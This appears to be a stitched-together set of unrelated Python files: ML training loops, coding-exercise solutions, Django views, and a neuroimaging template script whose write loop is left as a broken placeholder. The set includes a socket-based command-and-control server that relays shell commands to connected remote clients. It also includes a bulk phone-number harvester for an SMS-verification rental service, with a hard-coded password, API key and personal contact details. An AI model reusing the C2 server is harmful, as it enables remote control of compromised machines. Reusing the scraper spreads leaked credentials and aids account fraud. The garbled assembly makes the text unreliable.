            if cur_attn.size()[1] != max_length:
                delta_text = abs(cur_attn.size()[1] - max_length)
                cur_attn = cur_attn.cpu()
                attn[idx] = torch.cat((cur_attn, torch.zeros((cur_attn.size()[0], delta_text), dtype=cur_attn.dtype)), 1).to(device)
        for idx, cur_feat in enumerate(feat):
            if cur_feat.size()[1] != max_length:
                delta_text = abs(cur_feat.size()[1] - max_length)
                cur_feat = cur_feat.cpu()
                feat[idx] = torch.cat((cur_feat, torch.zeros((cur_feat.size()[0], delta_text), dtype=cur_feat.dtype)), 1).to(device)
        return_tuple = return_tuple + (torch.cat(attn), torch.cat(feat), )
    return return_tuple
def train_pos_neg(model, pos_iterator, neg_iterator, optimizer, criterion, device,
                  detach_hidden=False, batch_size=0,
                  metric='acc'):
    """
    Train model for an epoch on balanced batches: each step concatenates one
    batch from the positive-case iterator with one from the negative-case
    iterator.
    Args:
        model (nn.Module): any pytorch model with defined forward
        pos_iterator / neg_iterator : yield (sequence, seq length, labels)
        optimizer : stepped once per combined batch
        criterion : loss function
        device : cpu or gpu
        detach_hidden : bool default False
            Used to detach hidden state between batches,
            and will add a new hidden state to model
            Model must have .init_hidden function defined
        batch_size : int default 0
            used when detach_hidden is enabled
            to create the correct hidden sizes during initialization
        metric : 'acc' for accuracy; anything else delegates to
            metrics.compute_single_metric
    Returns:
        tuple containing:
            average loss for whole epoch,
            average metric for whole epoch
    """
    def repackage_hidden(h):
        # Detach hidden state tensors from their history.  BUGFIX: defined
        # locally because no module-level repackage_hidden exists -- the old
        # code raised NameError whenever detach_hidden=True.
        if isinstance(h, torch.Tensor):
            return h.detach()
        return tuple(repackage_hidden(v) for v in h)
    epoch_loss = 0
    epoch_metric = 0
    # BUGFIX: the zipped iterators have no single len(); the old code divided
    # by an undefined name `iterator` and raised NameError on every call.
    num_batches = 0
    model.train()
    for idx, ((pos_text, pos_text_lengths, pos_labels), (neg_text, neg_text_lengths, neg_labels)) in enumerate(zip(pos_iterator, neg_iterator)):
        num_batches += 1
        text = torch.cat((pos_text, neg_text))
        text_lengths = torch.cat((pos_text_lengths, neg_text_lengths))
        labels = torch.cat((pos_labels, neg_labels))
        optimizer.zero_grad()
        if detach_hidden:
            if batch_size == 0:
                raise ValueError('Batch_size in training needs to number with detach_hidden')
            hidden = model.init_hidden(batch_size)
            hidden = repackage_hidden(hidden)
        text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
        if detach_hidden:
            predictions, hidden = model(text, text_lengths, hidden)
        else:
            predictions = model(text, text_lengths).squeeze(1)
        loss = criterion(predictions, labels.type_as(predictions))
        loss.backward()
        optimizer.step()
        if metric == 'acc':
            batch_metric = get_average_accuracy(predictions, labels)
        else:
            batch_metric = metrics.compute_single_metric(labels.cpu().numpy(), predictions.detach().cpu().numpy())
        epoch_loss += loss.item()
        epoch_metric += batch_metric
    if num_batches == 0:
        return 0.0, 0.0
    return epoch_loss / num_batches, epoch_metric / num_batches
##### OLD CODE
def build_text_dataset(df, feat_colnames, label_colnames, vocab=None, min_freq=1):
    """
    Build pytorch text classification dataset.
    Args:
        df (dataframe): contains both features and labels
        feat_colnames (list): columns that the sequence resides in
        label_colnames (list): columns that contains labeling information
        vocab (Vocab): vocabulary to be used with this dataset.
                default None, which function will build vocabulary
                based on words in df[feat_colnames]
        min_freq (int): minimum frequency to use for building vocabulary
                only used if need to build vocabulary
    Returns:
        (TextClassificationDataset)
    """
    def create_tuple(labels, features, vocab):
        # Map one row to (label tensor, token-index tensor); 'nan' cells
        # (empties read back through pandas) are dropped; OOV words map to <unk>.
        # BUGFIX: removed an unreachable `else: return vocab` clause on the
        # try/except -- the try block always returns, so it could never run,
        # and if it had run it would have returned the wrong type.
        try:
            sentence = [x for x in features if str(x).lower() != 'nan']
            sentence = torch.tensor([vocab.stoi[x] if x in vocab.stoi.keys() else vocab.stoi['<unk>'] for x in sentence])
            return (torch.tensor(labels), sentence)
        except Exception as excpt:
            print(sentence)
            print(excpt)
            raise ValueError
    if vocab is None:
        counter = Counter()
        # flatten all feature columns into one word list
        words = df[feat_colnames].values.ravel('K')
        words = [str(x) for x in words if str(x).lower() != 'nan']
        counter.update(words)
        if not isinstance(min_freq, numbers.Number):
            raise ValueError(f'Something wrong with {min_freq}')
        vocab = Vocab(counter, min_freq=min_freq, specials=['<pad>', '<unk>'])
        print('Completed vocabulary')
    else:
        print('Vocab already supplied')
    # create dataset
    data = df.apply(
        lambda row: create_tuple(row[label_colnames],
                                 row[feat_colnames],
                                 vocab), axis=1)
    # NOTE(review): with a list of label columns this yields a set of column
    # NAMES, not label values -- confirm this is intended.
    labels = set(df[label_colnames])
    new_dataset = text_classification.TextClassificationDataset(vocab, data, labels)
    print('New dataset created')
    return new_dataset
def train(model, iterator, optimizer, criterion, device, detach_hidden=False, batch_size=0,
          metric='acc'):
    """
    Train model for an epoch.
    Args:
        model (nn.Module): any pytorch model with defined forward
        iterator : iterator for dataset, yields (ids, sequence, seq length, labels)
        optimizer : stepped once per batch
        criterion : loss function
        device : cpu or gpu
        detach_hidden : bool default False
            Used to detach hidden state between batches,
            and will add a new hidden state to model
            Model must have .init_hidden function defined
        batch_size : int default 0
            used when detach_hidden is enabled
            to create the correct hidden sizes during initialization
        metric : 'acc' for accuracy; anything else delegates to
            metrics.compute_single_metric
    Returns:
        tuple containing:
            average loss for whole epoch,
            average metric for whole epoch
    """
    def repackage_hidden(h):
        # Detach hidden state tensors from their history.  BUGFIX: defined
        # locally because no module-level repackage_hidden exists -- the old
        # code raised NameError whenever detach_hidden=True.
        if isinstance(h, torch.Tensor):
            return h.detach()
        return tuple(repackage_hidden(v) for v in h)
    epoch_loss = 0
    epoch_metric = 0
    model.train()
    for idx, (ids, text, text_lengths, labels) in enumerate(iterator):
        optimizer.zero_grad()
        if detach_hidden:
            if batch_size == 0:
                raise ValueError('Batch_size in training needs to number with detach_hidden')
            hidden = model.init_hidden(batch_size)
            hidden = repackage_hidden(hidden)
        text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
        if detach_hidden:
            predictions, hidden = model(text, text_lengths, hidden)
        else:
            predictions = model(text, text_lengths).squeeze(1)
        loss = criterion(predictions, labels.type_as(predictions))
        loss.backward()
        optimizer.step()
        if metric == 'acc':
            batch_metric = get_average_accuracy(predictions, labels)
        else:
            batch_metric = metrics.compute_single_metric(labels.cpu().numpy(), predictions.detach().cpu().numpy())
        epoch_loss += loss.item()
        epoch_metric += batch_metric
    return epoch_loss / len(iterator), epoch_metric / len(iterator)
|
# --------------------------------------------------------------------
import doctest
import unittest
import os
import sys
# --------------------------------------------------------------------
def sq (x) -> int: # Doctest examples below raise when expectations are not met
    '''
    Return the square of the input number.
    >>> sq(0)
    0
    >>> sq (1)
    1
    >>> sq (10)
    100
    >>> sq (15)
    225
    '''
    return x * x
# --------------------------------------------------------------------
class sqtest (unittest.TestCase): # Assertion-based tests for sq()
    # Demo test case: the second assertion is intentionally wrong so the
    # unittest run shows a failure.
    def testFunc (self): # Must start with "test" but the name itself can be arbitrary
        self.assertEqual (sq (1), 1)
        self.assertEqual (sq (5), 26) # Fails (deliberately: sq(5) is 25)
        self.assertFalse (sq (0))  # 0 is falsy, so this passes
if __name__ == "__main__":
    # BUGFIX: `doctest.testmod` without parentheses only referenced the
    # function object -- the doctests never actually ran.
    doctest.testmod ()
    os.system ("pause")
    del sys.argv[1:] # Otherwise command line arguments are treated as test cases!
    # unittest.main() calls sys.exit, so the final pause only runs with exit
    # suppressed by the environment (pre-existing behavior, kept as-is).
    unittest.main ()
    os.system ("pause")
# --------------------------------------------------------------------
|
import socket
import sys
import threading
import time
from queue import Queue
# Number of worker threads: one runs the server socket, one the shell.
Number_OF_THREADS=2
# Job ids consumed by work(): 1 = accept connections, 2 = interactive shell.
JOB_NUMBER=[1,2]
queue=Queue()
# Global registries of live client sockets and their peer addresses,
# kept index-aligned (entry i in each list describes the same client).
all_connection=[]
all_address=[]
def create_socket():
    """Create the server socket, exposing host/port/s as module globals."""
    global host, port, s
    try:
        host = ""
        port = 9999
        s = socket.socket()
    except socket.error as mess:
        print(str(mess))
def bind_socket():
    """Bind the global socket to (host, port) and start listening.

    On failure the error is printed and the function retries by calling
    itself recursively.  NOTE(review): a persistently failing bind (e.g.
    port already in use) recurses without bound -- confirm acceptable.
    """
    try:
        global host
        global port
        global s
        s.bind((host,port))
        s.listen(5)  # backlog of 5 pending connections
    except socket.error as mess:
        print(mess)
        bind_socket()
#handling connection from multiple client and saving in a list
def accepting_connections():
    """Accept clients forever, recording each socket and peer address.

    Any previously tracked connections are closed and the global
    registries cleared before the accept loop starts.
    """
    for i in all_connection:
        i.close()
    del all_connection[:]
    del all_address[:]
    while True:
        try:
            conn,addr=s.accept()
            # NOTE(review): setblocking(1) puts the socket in BLOCKING mode;
            # the original comment claimed the opposite -- confirm intent.
            s.setblocking(1)#prevents time blocking
            all_connection.append(conn)
            all_address.append(addr)
            print("connection has been establised:"+addr[0])
        except:
            # broad except keeps the accept loop alive on any error
            print("Error")
#Interative shell
def start_turtle():
    """Interactive shell: 'list' shows clients, 'select N' attaches to one."""
    while True:
        cmd=input("radeon$")
        if cmd == 'list':
            print(all_address)
            list_connection()
        elif 'select' in cmd:
            # resolve 'select N' to the N-th connection; None means invalid
            conn=get_target(cmd)
            if conn is not None:
                send_command(conn)
        else:
            print("Command not recognised")
#display all the connection
def list_connection():
    """Print an indexed table of live client connections.

    Each connection is probed with a dummy command first; dead ones are
    removed from the global registries so the printed indices match what
    get_target() will resolve.
    """
    # BUGFIX: walk backwards so deleting dead entries does not shift the
    # indices of entries still to be visited (the old forward enumerate
    # skipped the element following every deletion).
    for i in range(len(all_connection) - 1, -1, -1):
        c = all_connection[i]
        try:
            print("trying")
            c.send(str.encode("echo ter"))
            c.recv(4096)
        except:
            print("except")
            del all_connection[i]
            del all_address[i]
    # BUGFIX: accumulate with += (the old `results =` overwrote the string
    # each iteration, so only the last client was ever printed).
    results = ''
    for i, c in enumerate(all_connection):
        results += str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
    print("-------CLIENTS------ " + " \n " + results)
#select Conection
def get_target(cmd):
    """Resolve a 'select N' command to the N-th stored connection.

    Returns the connection object, or None when the index is not valid.
    """
    try:
        index = int(cmd.replace('select ', ''))
        con = all_connection[index]
        print("target_selected", all_address[index][0])
        print(all_address[index][0], ">", end="")
        return con
    except:
        # any parse/lookup failure means the selection was invalid
        print("Selection not valid")
        return None
#send command
def send_command(conn):
    """Relay shell input to the selected client and echo its replies.

    'quit' terminates the whole process; any send/recv failure breaks
    back to the main shell loop.
    """
    while True:
        try:
            ter=input()
            if (ter =='quit'):
                exit()
            if (len(str.encode(ter))>0):
                conn.send(str.encode(ter))
                # read up to 20 KiB of the client's response
                client_res=str(conn.recv(20480),'utf-8')
                print(client_res,end="")
        except:
            print("Error in sending")
            break
#creating thread
def create_worker():
    """Spawn Number_OF_THREADS daemon threads running the work() loop."""
    for _ in range(Number_OF_THREADS):
        worker = threading.Thread(target=work)
        worker.daemon = True
        worker.start()
def create_job():
    """Enqueue each job id, then block until all queued jobs are done."""
    for job in JOB_NUMBER:
        queue.put(job)
    queue.join()
def work():
    """Worker loop: pull a job id off the queue and dispatch it.

    Job 1 runs the server side (create/bind/accept); job 2 runs the
    interactive shell.  Both handlers loop forever, so task_done() is
    effectively never reached in normal operation.
    """
    while True:
        x=queue.get()
        if (x==1):
            create_socket()
            bind_socket()
            accepting_connections()
        if (x==2):
            start_turtle()
        queue.task_done()
# Script entry: start the worker threads, then enqueue the two jobs and
# wait on the queue (job 1 = server socket, job 2 = interactive shell).
create_worker()
create_job()
|
"""
Time Complexity = O(N)
Space Complexity = O(1)
"""
class Solution:
    def minCostToMoveChips(self, position: 'List[int]') -> int:
        """Minimum cost to stack all chips on one position.

        Moving a chip by 2 is free and by 1 costs 1, so every chip reduces
        to its parity; the answer is the smaller of the even-position and
        odd-position chip counts.

        Note: the annotation is quoted because `typing.List` is not
        imported in this file -- an unquoted `List[int]` raises NameError
        at class-definition time outside the LeetCode harness.
        """
        even = odd = 0
        for p in position:
            if p % 2 == 0:
                even += 1
            else:
                odd += 1
        return min(odd, even)
#!/usr/bin/python
#-*- coding: utf-8 -*-
'''
Created on 2017-04-07 15:17:55
@author: Maxing
'''
import requests
from requests.exceptions import ConnectionError
import time
import os
import sys
import json
import codecs
import logging
from utils import save_items, get_items_from_file, add_item_fields, log_init
reload(sys)
sys.setdefaultencoding('utf8')
# 基码(http://www.jima123.com/)
# 账号/密码: kkk321(kkk321)
# 登录后, token有效期为10分钟, 过期需要重新申请token
# 平台接口前缀: 'http://api.ltxin.com:8888'
'''
账户基本信息
account_info = {
'user_info': {
u'用户名': 'kkk321',
u'用户类别': '登堂入室',
u'最大登陆数量': '5',
u'最大取号数量': '10',
u'用户余额': '0.00',
u'暂冻余额': '0.00',
u'积分': '10.00',
u'真实姓名': '赵四',
u'联系电话': '18926779674',
u'开发者余额': '0.0000',
u'QQ': '1747485592',
}
u'Developer': 'yTVCJOLThoMGGJaQSqFImyv86Jnsx2vv',
}
'''
# Developer API key
DEVELOPER = r'yTVCJOLThoMGGJaQSqFImyv86Jnsx2vv'
# API endpoint prefix
API_PREFIX = r'http://api.jima123.com/api.php'
# File that caches the site's item (task) metadata
ITEMS_FILE = os.path.sep.join([sys.path[0] , 'items', 'jima_items.json'])
# File the harvested phone numbers are appended to (one file per day)
current_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
PHONE_FILE = sys.path[0] + os.path.sep + 'data' + os.path.sep + 'jima_phone_%s.txt' % (current_date)
# LOG (one log file per month)
month = time.strftime('%Y-%m', time.localtime(time.time()))
LOG_FILE = os.path.sep.join([sys.path[0], 'log', 'jima_%s.log' % month])
class Jima(object):
    """Client for the jima123.com phone-number rental API (Python 2 code).

    Wraps login/token handling plus the item, area, number-fetch and
    number-release endpoints.  Per the header comments, tokens expire
    after ~10 minutes, so callers re-login periodically (see main()).
    """
    def __init__(self):
        # endpoint configuration and account credentials
        self.api_prefix = API_PREFIX
        self.developer = DEVELOPER
        self.user_name = 'kkk321'
        self.user_pwd = 'kkk321'
        self.token = ''
        self.userid = '11744'
        self.phone_list = ''
        # browser-like headers so requests look like an ordinary client
        self.headers = {
            'Host': 'api.jima123.com',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4',
        }
        # one logger per class name, written to the monthly log file
        log_name = self.__class__.__name__
        log_init(log_name, LOG_FILE)
        self.logger = logging.getLogger(log_name)
        self.logger.info(u'开始采集' + '-'*30)
    # Unified request handling for all API calls
    def request(self, request_type, url, payload=None):
        # request_type: 'post' or 'get'
        # url: request address
        # payload: request parameters
        retry_time = 0
        while 1:
            try:
                if request_type == 'post':
                    r = requests.post(url=url, headers=self.headers, data=payload, allow_redirects=False)
                elif request_type == 'get':
                    r = requests.get(url=url, headers=self.headers, params=payload, allow_redirects=False)
                r.encoding = 'gb2312'
                # errno '0' = OK, '3059' = handled specially by callers
                if r.status_code == 200 and r.json().get('errno') in ['0','3059']:
                    return r.json()
                elif r.status_code == 504:
                    time.sleep(5)
                    self.logger.info(str(r.status_code) + u'\t网关超时, 休眠5秒。')
                else:
                    return
            except ConnectionError:
                # server actively refused us; back off for 30 seconds
                self.logger.info(u'被对方服务器主动拒绝, 暂停30S。')
                time.sleep(30)
            except Exception, e:
                self.logger.info(e)
                return
    # Log in and obtain the user token
    def login(self):
        payload = {
            'act': 'login',
            'username': self.user_name,
            'password': self.user_pwd,
            'developer': self.developer,
        }
        url = self.api_prefix
        # retry until login succeeds
        while 1:
            login_res_json = self.request('get', url, payload)
            if login_res_json and login_res_json['errno'] == '0':
                self.token = login_res_json['data'][0]['token'].strip()
                self.userid = login_res_json['data'][0]['userid'].strip()
                if self.token != '':
                    self.logger.info(u'登录成功!')
                    return
            else:
                self.logger.info(u'登录失败!重试中。。。')
                time.sleep(1.5)
    # Fetch the list of available items (tasks)
    def get_items(self):
        # item types:
        # 0 - receive code
        # 1 - send code
        # 4 - receive multiple codes
        # 5 - send multiple codes
        payload = {
            'act': 'gettask',
            'userid': self.userid,
            'token': self.token,
        }
        url = self.api_prefix
        item_json = self.request('get', url, payload=payload)
        if item_json and item_json['errno'] == '0':
            self.logger.info(u'获取项目列表OK')
            item_list = item_json['data']
            items = []
            for item in item_list:
                item_dict = {}
                item_dict['item_id'] = item['taskid']
                item_dict['item_name'] = item['taskname']
                item_dict['item_price'] = item['gold']
                item_dict['item_type'] = item['type']
                items.append(item_dict)
            return items
    # Fetch the list of regions (provinces)
    def get_area(self):
        area_url = self.api_prefix
        payload = {
            'act': 'getarea',
            'userid': self.userid,
            'token': self.token,
        }
        area_res_json = self.request('get', area_url, payload)
        area_list = area_res_json['data']
        # sample response:
        # {"errno":"0","errmsg":"OK","data":[
        #     {"provinceid":"11","province":"\u5317\u4eac\u5e02"},
        #     {"provinceid":"12","province":"\u5929\u6d25\u5e02"}
        #     ]
        # }
        return area_list
    # Fetch phone numbers for an item
    def get_num(self, item_id, count):
        # item_id: item id
        # count: how many phone numbers to fetch
        payload = {
            'act': 'getmobile',
            'userid': self.userid, # user id, required
            'token': self.token, # login token, required
            'taskid': item_id, # item (task) code, required
            'mobile': '', # request a specific phone number
            'max': '', # maximum unit price
            'min': '', # minimum unit price
            'key': '', # dedicated key for direct card-vendor hookup
            'count': str(count), # how many to fetch (default 1, max 10)
            'area': '', # region (random when empty)
            'operator': '', # carrier (0 random, 1 China Mobile, 2 Unicom, 3 Telecom)
        }
        url = self.api_prefix
        num_json = self.request('get', url, payload)
        nums = []
        if num_json:
            self.logger.info('errno is : %s' % (num_json['errno']))
            if num_json['errno'] == '0':
                nums = [mobile_data['mobile'] for mobile_data in num_json['data']]
                # remember "<num>-<item_id>;..." so release_phone can free them
                add_str = '-%s;' % (item_id)
                self.phone_list = add_str.join(nums) + add_str.strip(';')
            elif num_json['errno'] == '3059':
                self.logger.info(num_json['errmsg'])
        return nums
    # Release the numbers recorded in self.phone_list
    def release_phone(self):
        url = self.api_prefix
        payload = {
            'act': 'resmobile',
            'userid': self.userid,
            'token': self.token,
            'list': self.phone_list,
        }
        release_res_json = self.request('get', url, payload)
        if release_res_json['errno'] == '0':
            self.logger.info(u'释放号码成功!')
    # Release all numbers held by this account
    def release_all_phone(self):
        url = self.api_prefix
        payload = {
            'act': 'resall',
            'userid': self.userid,
            'token': self.token,
        }
        resall_res_json = self.request('get', url, payload)
        if resall_res_json['errno'] == '0':
            self.logger.info(u'释放所有号码成功!')
    # Log out (invalidate the token)
    def exit(self):
        url = self.api_prefix
        payload = {
            'act': 'quit',
            'userid': self.userid,
            'token': self.token
        }
        exit_res_json = self.request('get', url, payload)
        if exit_res_json['errno'] == '0':
            self.logger.info(u'退出成功!')
def main():
    """Collection loop: log in, fetch items, harvest and release numbers."""
    jima = Jima()
    jima.login()
    # load the item list from the cache file if present, otherwise fetch
    # it from the API and cache it
    if os.path.exists(ITEMS_FILE):
        items = get_items_from_file(ITEMS_FILE)
        jima.logger.info(u'从文件中读取__%s__网站可接收验证码项目%d个。' % (
            str(jima.__class__).split('.')[1].strip("'>"), len(items)))
    else:
        items = jima.get_items()
        save_items(items, ITEMS_FILE)
        jima.logger.info(u'一共获取__%s__网站可接收验证码项目%d个。' % (
            str(jima.__class__).split('.')[1].strip("'>"), len(items)))
    for item in items:
        # take 10 passes per item
        # (the site may freeze accounts that request too aggressively)
        for i in xrange(10):
            time.sleep(5.5)  # throttle between requests
            item_name = item.get('item_name')
            item_id = item.get('item_id')
            item_price = float(item.get('item_price'))
            item_type = item.get('item_type')
            jima.logger.info(u'项目: __%s__, ID: __%s__, 价格: __%s__' % (item_name, item_id, item_price))
            if item_id and item_price <= 10:
                nums = jima.get_num(item_id, 10)
                jima.logger.info(nums)
                if len(nums) == 0:
                    jima.logger.info(u'没有获取到有效号码')
                    # no valid numbers: re-login to refresh the token and retry
                    jima.exit()
                    jima.login()
                    continue
                phone_items = []
                for num in nums:
                    current_time = time.strftime(
                        '%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                    phone_item = {
                        'item_name': item_name, # item name
                        'item_id': item_id, # item id
                        'crawl_time': current_time, # crawl timestamp
                        'item_price': item_price, # item price
                        'item_type': item_type, # item type
                        'phone': num, # phone number
                        'portal': u'基码', # source portal (jima)
                    }
                    new_item = add_item_fields(phone_item)
                    phone_items.append(new_item)
                save_items(phone_items, PHONE_FILE)
                # release the fetched numbers
                jima.release_all_phone()
            else:
                jima.logger.info(u'项目价格超过10元, 放弃.')
        # log out between items
        jima.exit()
        # re-login to refresh the token
        jima.login()
    jima.logger.info(u'采集结束' + '-'*30)
# Run the collection loop when executed as a script.
if __name__ == '__main__':
    main()
#!/usr/bin/python
# This script generates templates for level 1 analysis performed after ICA-AROMA. Adapted from Jeanette Mumford.
import os
import glob

# Directory that contains all of the sub### directories.
studydir = '/Volumes/KATYA5GBA/HCP_Gambling_RESULTSevent'
# Directory where the generated .fsf files are dumped.  May want to keep it
# separate, because the files can be deleted once Feat has run.
fsfdir = '/Users/edobryakova/Documents/HCPgambling_templates/lev1_fsf'

# Grab every ICA* run directory.  Note: nothing here omits bad subjects.
subdirs = glob.glob("%s/*/*[LR][RL]/ICA*" % (studydir))

# Renamed loop variable from `dir` to avoid shadowing the builtin; dropped the
# redundant list() wrap and the no-op `[:]` copy of the subject id.
for run_dir in subdirs:
    splitdir = run_dir.split('/')
    # EDIT HERE if the subject id sits at a different path depth.
    subnum = splitdir[4]
    # EDIT HERE to grab the path component that carries the encoding/run.
    splitdir_encoding = splitdir[5]
    encoding = splitdir_encoding[15:]
    print(subnum)
    # Number of timepoints in the denoised 4D image (fslnvols prints it).
    ntime = os.popen('fslnvols %s/denoised_func_data_nonaggr.nii.gz' % (run_dir)).read().rstrip()
    replacements = {'SUBNUM': subnum, 'NTPTS': ntime, 'ENCODING': encoding}
    with open("/Users/edobryakova/Documents/HCPgambling_templates/lev1_template.fsf") as infile:
        with open("%s/lev1_ER_%s_%s.fsf" % (fsfdir, subnum, splitdir_encoding), 'w') as outfile:
            for src, target_pairs_line in ((None, None),):
                pass  # placeholder removed below
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Detail
from .serializers import Detailserializers
from rest_framework.renderers import JSONRenderer
# Create your views here.
def index(request):
    """Plain-text landing page for the practice app."""
    greeting = HttpResponse("welcome to the practice")
    return greeting
def see(request):
    """Serialize every Detail row and return the whole list as JSON."""
    queryset = Detail.objects.all()
    serialized = Detailserializers(queryset, many=True)
    payload = JSONRenderer().render(serialized.data)
    return HttpResponse(payload, content_type='application/json')
def seeone(request, id):
    """Serialize the single Detail row with the given primary key as JSON.

    Note: ``objects.get`` raises ``Detail.DoesNotExist`` for an unknown id,
    which surfaces as a server error (same behavior as before).
    """
    record = Detail.objects.get(id=id)
    serialized = Detailserializers(record)
    payload = JSONRenderer().render(serialized.data)
    return HttpResponse(payload, content_type='application/json')
|
#7. Write a code to compare two string data based on the length of the string hint; __gt__ method
import re
class Comp():
    """Wrap a string and compare instances primarily by length, falling back
    to lexicographic order on ties (implements only ``>``).  Python 2 code:
    uses print statements.
    """
    def __init__(self, values):
        # Name-mangled to _Comp__values; still reachable from other Comp
        # instances inside this class body (strng.__values below).
        self.__values = values
    def __gt__(self,strng):
        # Identical strings: report and treat as "not greater".
        if(self.__values==strng.__values):
            print "You entered same strings"
            return False
        else:
            # Strictly longer string wins outright.
            if(len(self.__values)>len(strng.__values)):
                print 'The first string : "'+self.__values+'" is a bigger string based on length'
                return True
            # Equal length: fall back to ordinary string comparison.
            elif(len(self.__values)==len(strng.__values)):
                if((self.__values)>(strng.__values)):
                    print 'The first string : "'+self.__values+'" is a bigger string based on alphabetical/numeric order, preference starting from first values'
                    return True
                else:
                    print 'The second string : "'+strng.__values+'" is a bigger string based on alphabetical/numeric order, preference starting from first values'
                    return False
            else:
                print 'The second string : "'+strng.__values+'" is a bigger string based on length'
                return False
# Interactive driver (Python 2: raw_input / print statements).
# NOTE(review): the loop only breaks on invalid input, so valid pairs are
# compared and then the user is prompted again indefinitely — confirm intent.
print 'Enter 2 values, You can enter any value but it would be treated as STRING'
while(True):
    a = raw_input('Enter first string ').lower()
    str1 = Comp(a)
    # \W matches any non-word character (symbols or whitespace) -> reject.
    matchObj = re.search( r'\W', a, re.M|re.I)
    if matchObj:
        print 'You have entered symbols or whitespaces'
        break
    b = raw_input('Enter second string ').lower()
    str2 = Comp(b)
    matchObj = re.search( r'\W', b, re.M|re.I)
    if matchObj:
        print 'You have entered symbols or whitespaces'
        break
    print str1>str2 #Operator Overloading
|
# The bullet points associated with this set of tests in the evaluation document.
test_set_id = "2.2.2"
# User-friendly name of the tests.
test_set_name = "Search Params"
# Shared module logger so every test in this set logs under the same entry.
import logging
logger = logging.getLogger(__name__)
|
class TreeNode(object):
    """Minimal binary-tree node: a value plus left/right child links."""

    def __init__(self, x):
        self.val = x
        # Children start out absent; callers attach TreeNode instances later.
        self.left = self.right = None
class Solution(object):
    def sortedArrayToBST(self, nums):
        """
        Convert a sorted array into a height-balanced BST.

        :type nums: List[int]
        :rtype: TreeNode

        Bug fix: the original computed the midpoint with ``len(nums)/2``,
        which is float division on Python 3 and raises TypeError when used
        as a slice/index; ``//`` keeps it an int on both Python 2 and 3.
        """
        def build(segment):
            # Empty slice -> no subtree.
            if not segment:
                return None
            mid = len(segment) // 2
            # Middle element becomes the root, keeping the tree balanced.
            root = TreeNode(segment[mid])
            root.left = build(segment[:mid])
            root.right = build(segment[mid + 1:])
            return root
        return build(nums)
|
from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
import numpy
from selenium import webdriver
from bs4 import BeautifulSoup
import requests as rq
import pandas as pd
from time import sleep
import re
import aspect_based_sentiment_analysis as absa
# Module-level cache of per-aspect review lists: scrapping() appends 20 lists
# per comparison (url1 aspects at indices 0-9, url2 aspects at 10-19) and
# sortreviews() reads them back by index.  NOTE(review): never cleared, so it
# grows across requests — confirm whether that is intended.
modal_list=[]
# Create your views here.
def home(request):
    # Landing page.
    return render(request, 'home.html')
def compare(request) :
    # Empty comparison form (filled in by outputcompare on POST).
    return render(request,'compare.html')
def about(request):
    # Static about page.
    return render(request,'about.html')
def outputcompare(request):
    """Handle the compare-form POST: scrape both product URLs, run
    aspect-based sentiment analysis on their reviews, and render the
    comparison page with the combined context dict.
    """
    url1=request.POST['url1']
    url2=request.POST['url2']
    # Build the (expensive) ABSA pipeline once, then scrape + classify both.
    nlp=absa_analysis()
    url1_url2_dict=scrapping(url1,url2,nlp)
    # def analysis(){}
    #barvalues=showbar()
    #spectsdict.update(barvalues)
    #print(spectsdict)
    return render(request,'compare.html',url1_url2_dict)
# Maps the AJAX widget id to the index of its cached review list in
# modal_list (url1 aspects live at indices 0-9, url2 aspects at 10-19;
# even index = liked/positive reviews, odd index = disliked/negative).
_MODAL_INDEX = {
    'like0': 0, 'dislike0': 1,
    'like1': 10, 'dislike1': 11,
    'like2': 2, 'dislike2': 3,
    'like3': 12, 'dislike3': 13,
    'like4': 4, 'dislike4': 5,
    'like5': 14, 'dislike5': 15,
    'like6': 6, 'dislike6': 7,
    'like7': 16, 'dislike7': 17,
    'like8': 8, 'dislike8': 9,
    'like9': 18, 'dislike9': 19,
}


def sortreviews(request):
    """Return the cached review list for the widget named by ``?idname=``.

    Replaces the original 20-branch if/elif chain with a dict lookup;
    behavior is unchanged: unknown/missing ids yield an empty JSON list,
    and if modal_list has not been populated yet (IndexError) the response
    is ['-1'] so the frontend can detect the cold cache.
    """
    idname = request.GET.get('idname', None)
    print(idname)
    reviewlist = []
    try:
        if idname in _MODAL_INDEX:
            reviewlist = modal_list[_MODAL_INDEX[idname]]
    except IndexError:
        reviewlist.append('-1')
    return JsonResponse(reviewlist, safe=False)
def scrapping(url1,url2,nlp) :
    """Scrape specs, product image and per-aspect reviews for two product
    URLs (Flipkart or Amazon), classify review sentiment per aspect with the
    ABSA pipeline *nlp*, cache the review lists in the module-level
    modal_list, and return one merged template-context dict.

    NOTE(review): hard-coded chromedriver path and CSS class names make this
    extremely brittle; original indentation was lost on ingest and has been
    reconstructed — verify nesting against the live file.
    """
    comment=[]
    comment1=[]
    link=[]
    link1=[]
    spects=[]
    key_spects=[]
    key_spects1=[]
    spects1=[]
    if "flipkart.com" in url1 :
        driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
        driver.maximize_window()
        driver.get(url1)
        r1=rq.get(url1)
        soup1 =BeautifulSoup(r1.text,'html.parser')
        imgscrp=BeautifulSoup(driver.page_source,'html.parser')
        #specifications scrapping
        RAM= soup1.find_all('li',{'class':'_21lJbe'})
        for ele in RAM:
            ram=ele.get_text()
            spects.append(ram)
        Keys=soup1.find_all('td',{'class':'_1hKmbr col col-3-12'})
        for key in Keys:
            k=key.get_text()
            k=k.replace(" ","")
            key_spects.append(k)
        #image scrapping
        src=imgscrp.find('div',{'class':'_1BweB8'})
        srcV1=src.find('img',{'class':'_396cs4 _2amPTt _3qGmMb _3exPp9'})
        url1_image=srcV1.get('src')
        # Image URL rides along in the same spec dict under 'url1_image'.
        key_spects.append('url1_image')
        spects.append(url1_image)
        url1_spects_img_dict=dict(zip(key_spects,spects))
